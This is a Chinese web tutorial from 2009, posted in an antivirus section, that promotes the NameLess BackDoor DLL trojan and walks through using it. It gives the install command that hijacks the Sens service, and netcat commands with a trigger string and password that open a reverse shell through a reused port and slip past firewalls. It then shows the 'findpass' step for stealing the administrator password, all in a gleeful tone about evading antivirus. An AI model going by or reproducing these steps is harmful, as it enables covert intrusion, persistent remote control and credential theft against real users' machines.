当前位置: 首页 > 图文教程 > 网络安全 > 杀毒防毒 > 气疯安全工具—新兴DLL型木马复仇记

杀毒防毒
来自微软的免费杀毒软件抢先试用
金山毒霸全新功能体验版抢先曝光
IRC后门病毒技术分析及手动清除方法
MSN性感鸡变种刚过,QQ病毒又来捣乱
Win XP中震荡波后应采取的措施
病毒应急处理中心提醒防范高波病毒及其变种
北京公安局、瑞星发布6月13日危险病毒警报
防御计算机病毒十大必知步骤
网吧用QQ隐私难保 黑客工具窥视QQ聊天记录
用MailSpy拦截局域网内危险的病毒邮件
如何根据名称识别计算机病毒
Norton AntiVirus 2005测试版截图大赏
快速干掉感染Internet Explorer的恶意程序
邮件病毒入侵后五个清除步骤
Win 2000防毒从安装系统时开始
木马病毒清除的通用解法
快速有效地封杀—巧利用Iris来查找蠕虫病毒
防病毒必务宝典—计算机病毒专杀进程列表
网络安全之特洛伊木马攻防战略
3721上网助手清除专家

杀毒防毒 中的 气疯安全工具—新兴DLL型木马复仇记


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 50 ::
收藏到网摘: n/a

 

  NameLess BackDoor是一款新兴的DLL型木马,这个木马出世没多久,但绝对是一匹极有潜质的千里驹。

  说起NameLess BackDoor的前身来,不得不提及榕哥的BITS和WinEggDrop的PortLess。这两款大名鼎鼎的木马曾经都风光一时,可以说是木马界的元老了。而NameLess BackDoor则是汇集了上面这两款木马的优点,在目标机器的进程管理器中看不到,平时没有端口,提供正向连接和反向连接两种功能。同时NameLess BackDoor又去除了各处的缺点,比如反弹的cmd.exe进程,在目标机器的进程管理中也可以隐藏无需利用BITS服务等(马儿:不开端口,无进程,看看防火墙和杀毒软件还能拿我怎么办!气死你,哈哈)。

  NameLess BackDoor实战演练

  将NameLess BackDoor安装上远程主机到连接木马控制主机,就像一场进行在杀毒软件和防火墙眼皮底下,却又无声无悄的暗战。

  一、随风潜入夜——安装

  下载NameLess BackDoor木马,压缩包中有两个名为NameLess.dll的DLL文件,一个Pack压缩加过壳的,一个是Unpack未压缩加壳的。先在本地用各种杀毒软件扫描一下这两个文件(笔者用的是最新病毒库的KV2005),但是一向以杀毒能力著称的KV2005竟然对这两个木马文件视而不见。呵,这下子可以放心的在任何环境下进行安装了。

  怎么将木马安装到远程的电脑上呢?当然最简单的就是扫描要攻击电脑上的系统漏洞,然后进行攻击入侵控制。方法很多了,反正你拿到远程主机的控制权后,将上面的任意一个“NameLess.dll”文件上传到远程主机上的。在这里笔者是使用Ttelnet远程连接后,写入一个FTP下载的BAT文件,直接在本地建立了一个FTP服务器,通过FTP服务器下载上传文件的(这些内容以前杂志介绍过,这里就不作过多的讲解啦)。下面重点来看看我是怎样安装木马文件的吧!

  在远程Ttelnet命令窗口中切换到文件上传目录中,并输入如下命令(如图1):

  Rundll32 NameLess.dll,Install

  执行该命令后后门就被安装成功了,后门会自动替换系统服务Sens的ServiceDll文件,在电脑重启后以Svchost.exe启动。

  小提示:由于NameLess BackDoor是一个DLL型木马,因此在安装和启动的过程中,远程主机上的杀毒软件不会有任何提示和反应。

  二、穿墙细无声——连接

  安装和启动的过程中顺利地搞定了杀毒软件,下面看看NameLess BackDoor怎么让防火墙无能为力的。
 
  小提示:NameLess BackDoor有两种连接方式:正向连接和反向连接,其中反向方式连接可以让防火墙不会发出任何提示。同时NameLess BackDoor在连接后门时使用了端口复用技术,通过重用系统进程开放的任意一个端口,因此可以轻松的穿透各种防火墙。

  我们首先需要扫描远程主机上开放了哪些端口,假设某台远程主机(IP地址为:192.168.1.11)上开放了139端口,那么可以本地打开一个命令窗口,切换到瑞士军刀NC所在的目录中,运行如下命令:

  nc
  -l -p 12345

  命令执行后将在本地监听12345端口,然后再打开一个命令窗口,输入如下命令(如图2):

  nc 192.168.1.11 139

  建立连接后输入如下内容(如图3):

  dargun|192.168.1.11:12345

  其中的IP地址可根据具体情况进行更改。命令执行后,在刚才的监听窗口中就可以看到出现了连接提示:“Enter Password:”,输入密码158352692后就可以成功的登陆远程主机而不被防火墙发现了!(如果我是防火墙,一定气疯了,哈)

  三、为我所欲为——控制

  成功“气死”杀毒软件和“逼疯”防火墙后,现在就可以控制远程主机了。NameLess

  BackDoor的强大也体现在它的控制功能上,连接登陆远程主机后,输入help命令,即可看到详细的命令帮助信息(如图4)。如果你使用过winshell或wineggdropshell的话,应该对这种模式的后门就不会陌生,不过就算从来没有使用过这样的后门,也会感觉很简单的。

  1.巧盗管理员密码

  连接上远程主机后该干什么呢?我得好好想一想……呵呵,看看管理员的密码是多少吧!

  在命令窗口中直接输入“findpass”命令,很快就可以看到管理员的密码了(如图5),真是够简单的